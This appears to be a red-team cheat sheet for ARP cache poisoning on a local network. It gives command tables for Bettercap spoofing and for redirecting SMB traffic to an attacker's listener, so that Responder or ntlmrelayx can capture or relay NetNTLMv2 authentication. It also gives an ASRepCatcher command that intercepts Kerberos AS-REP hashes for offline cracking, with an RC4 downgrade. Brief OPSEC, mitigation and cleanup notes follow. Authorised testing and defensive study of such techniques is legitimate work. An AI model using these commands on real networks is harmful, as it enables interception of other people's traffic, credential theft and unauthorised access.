ARP Poisoning¶
Poison a target host's IPv4 ARP cache to intercept traffic for a server or gateway: NetNTLMv2 capture / relay, Kerberos interception, or unencrypted traffic.
Quick start (Bettercap)¶
Run Bettercap on the same L2 segment / VLAN as the target host. Set <next_hop_ip> to the server's IP if on the same subnet, otherwise the target host's gateway.
| Action | Command |
|---|---|
| Start Bettercap | sudo bettercap -iface <iface> |
| Target host | set arp.spoof.targets <target_ip> |
| Impersonate server / gateway | set arp.spoof.spoofed <next_hop_ip> |
| Limit poisoning to selected next hop | set arp.spoof.internal false |
| Poison target host only | set arp.spoof.fullduplex false |
| Forward remaining traffic | set arp.spoof.forwarding true |
Configure the listener and redirection before
arp.spoof on. Poisoning alone does not redirect connections to a local listener.
NTLM capture / relay¶
Start Responder's SMB listener for capture, or ntlmrelayx for relay. Disable Responder's competing SMB/HTTP servers when relaying.
Inside Bettercap, redirect <smb_server_ip>:445 to <attacker_ip>:445 using any.proxy:
set any.proxy.iface <iface>
set any.proxy.protocol TCP
set any.proxy.src_address <smb_server_ip>
set any.proxy.src_port 445
set any.proxy.dst_address <attacker_ip>
set any.proxy.dst_port 445
any.proxy on
arp.spoof on
any.proxy.src_addressis the original destination server. Set the relay destination separately in ntlmrelayx.
| Outcome | Requirements / next step |
|---|---|
| Capture NetNTLMv2 | Save challenge-response material for offline cracking; it cannot be used for pass-the-hash or replayed later. |
| Relay NTLM | Forward live authentication to a compatible relay target; access depends on account permissions. |
- Requires new NTLM authentication; poisoning does not trigger it or force Kerberos fallback.
- PCredz extracts credentials from visible traffic or saved captures.
Kerberos interception (ASRepCatcher)¶
ASRepCatcher intercepts AS-REP material for offline cracking, even with preauthentication enabled. Requires a Kerberos AS exchange during interception.
Set <next_hop_ip> to the DC's IP if on the same subnet, otherwise the target host's gateway.
| Action | Command |
|---|---|
| Intercept AS requests | sudo ASRepCatcher relay -iface <iface> -gw <next_hop_ip> -dc <dc_ip> -t <target_ip> -outfile asrep.hashes |
| Stop poisoning after an AS-REP | Add --stop-spoofing |
- Uses built-in ARP poisoning; stop Bettercap poisoning/redirection first.
- Attempts an RC4 downgrade if target host, domain, and account encryption settings permit it.
- Standard AS-REP roasting requires preauthentication disabled.
Notes / OPSEC¶
- Scope: Specify targets; defaults can cover the subnet. Gateway spoofing can affect other routed traffic from those hosts.
- Capture direction: One-way poisoning without redirection may miss server replies.
- Controls: Dynamic ARP Inspection / enforced IP-MAC bindings can block poisoning; validated TLS protects application traffic.
- Relay protections: Required SMB signing, LDAP signing, and channel binding / EPA still block their respective relay paths.
- Bettercap cleanup:
arp.spoof off, thenany.proxy off. Keeparp.spoof.skip_restoreatfalsefor ARP restoration; verify connectivity. - ASRepCatcher cleanup:
Ctrl+C; verify restored firewall rules, forwarding, ARP mappings, and connectivity.